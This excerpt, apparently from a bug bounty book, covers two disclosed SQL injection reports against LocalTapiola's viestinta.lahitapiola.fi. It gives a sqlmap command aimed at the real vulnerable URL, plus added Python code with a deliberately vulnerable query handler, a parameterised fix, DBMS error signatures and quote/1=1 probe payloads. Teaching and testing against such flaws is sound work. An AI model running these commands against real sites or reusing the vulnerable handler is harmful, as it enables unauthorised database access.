Bug Bounty Hunting Essentials

LocalTapiola SQL injection

  • Title: SQL injection in viestinta.lahitapiola.fi.
  • Reported by: Yasar and Anandakshya.
  • Bounty Rewarded: $1,350 and $1,560.
  • Web application URL: https://viestinta.lahitapiola.fi.
  • Description: LocalTapiola is an insurance company that offers both life and non-life insurance policies to its customers. Because it has a large digital presence and an online, transaction-based business, it runs one of the most active bug bounty programs on HackerOne. LocalTapiola received two very descriptive SQL injection reports, which I decided to include in this chapter.

SQL injection by Yasar:

This was a very simple error-based SQL injection in LocalTapiola, identified by Yasar. The URL where the SQL injection was found was as follows: http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674.

The vulnerable parameter was regId. After identifying it, he simply used sqlmap to exploit the SQL injection, pointing the tool at that single parameter with the -p flag:

./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId

sqlmap confirmed that regId was injectable, and he used its output to verify the SQL injection in his report.

SQL injection by Anandakshya:

This was another SQL injection of a similar nature, found by Anand. He identified the vulnerability in the email parameter and exploited it with sqlmap against http://viestinta.lahitapiola.fi/webApp/omatalousuk?email=aaaaa.
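Neither report includes the server-side code, so the following is an added example, not code from LocalTapiola or from either hunter. It models the cancel_iltakoulu endpoint with a local sqlite3 stand-in, shows a hypothetical vulnerable handler that concatenates regId into the query next to a hardened, parameterised version, and implements the manual triage a hunter typically performs before running sqlmap -p regId: a single quote to provoke a reflected database error (the error-based case both reports describe), followed by a true/false pair to confirm the input is evaluated as SQL. The table name, column names, handler logic and error-signature list are assumptions for illustration; the same probe applies to the email parameter in the second report.

```python
import re
import sqlite3

# Constructed stand-in for the backend: one registration row with the IDs that
# appear in the reported URL. Table and column names are assumptions.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE registrations (regId INTEGER, locationId INTEGER, status TEXT)")
DB.execute("INSERT INTO registrations VALUES (478836614, 464559674, 'active')")
DB.commit()

# Fragments of DBMS error messages that error-based injection relies on seeing
# reflected in the response. The sqlite3 entries are what this stand-in emits.
ERROR_PATTERNS = [
    r"you have an error in your sql syntax",          # MySQL
    r"unclosed quotation mark after the character",   # MSSQL
    r"syntax error at or near",                       # PostgreSQL
    r"ora-\d{5}",                                     # Oracle
    r"unrecognized token|syntax error",               # sqlite3
]


def vulnerable_cancel(regId: str, locationId: str) -> str:
    """Hypothetical handler for cancel_iltakoulu that builds SQL by string
    concatenation. This is the bug class the report describes; the code is invented."""
    sql = (f"SELECT status FROM registrations WHERE regId = {regId} "
           f"AND locationId = {locationId}")
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The database error leaks into the HTTP response: that reflection is
        # what makes the injection error-based and trivially detectable.
        return f"500 Internal Server Error: {exc}"
    return "cancelled" if row else "no such registration"


def fixed_cancel(regId: str, locationId: str) -> str:
    """Hardened handler: the IDs are validated as integers and bound as query
    parameters, so user input is never interpreted as SQL."""
    try:
        rid, lid = int(regId), int(locationId)
    except ValueError:
        return "400 Bad Request"
    row = DB.execute(
        "SELECT status FROM registrations WHERE regId = ? AND locationId = ?",
        (rid, lid),
    ).fetchone()
    return "cancelled" if row else "no such registration"


def looks_like_db_error(body: str) -> bool:
    """True if the response body carries a recognisable DBMS error fragment."""
    return any(re.search(p, body, re.IGNORECASE) for p in ERROR_PATTERNS)


def probe(handler, params: dict, target: str) -> dict:
    """Manual triage before reaching for sqlmap: a single quote to provoke a
    reflected DB error, then a true/false pair to confirm the parameter is
    evaluated as SQL rather than merely rejected by input validation."""
    def send(payload: str) -> str:
        return handler(**{**params, target: params[target] + payload})

    baseline = handler(**params)
    quote = send("'")
    true_case, false_case = send(" AND 1=1"), send(" AND 1=2")
    return {
        "error_based": looks_like_db_error(quote) and not looks_like_db_error(baseline),
        "boolean_based": true_case == baseline and false_case != baseline,
    }


if __name__ == "__main__":
    params = {"regId": "478836614", "locationId": "464559674"}
    print("vulnerable:", probe(vulnerable_cancel, params, "regId"))
    print("fixed:     ", probe(fixed_cancel, params, "regId"))
```

Against the vulnerable handler the quote payload returns a reflected sqlite3 error and the 1=1 / 1=2 pair changes the response, which is exactly the signal sqlmap's error-based and boolean-based checks automate; against the hardened handler every payload is rejected with 400 and both verdicts are false. Parameter names keep the URL's camelCase so the probe can address them by their query-string names.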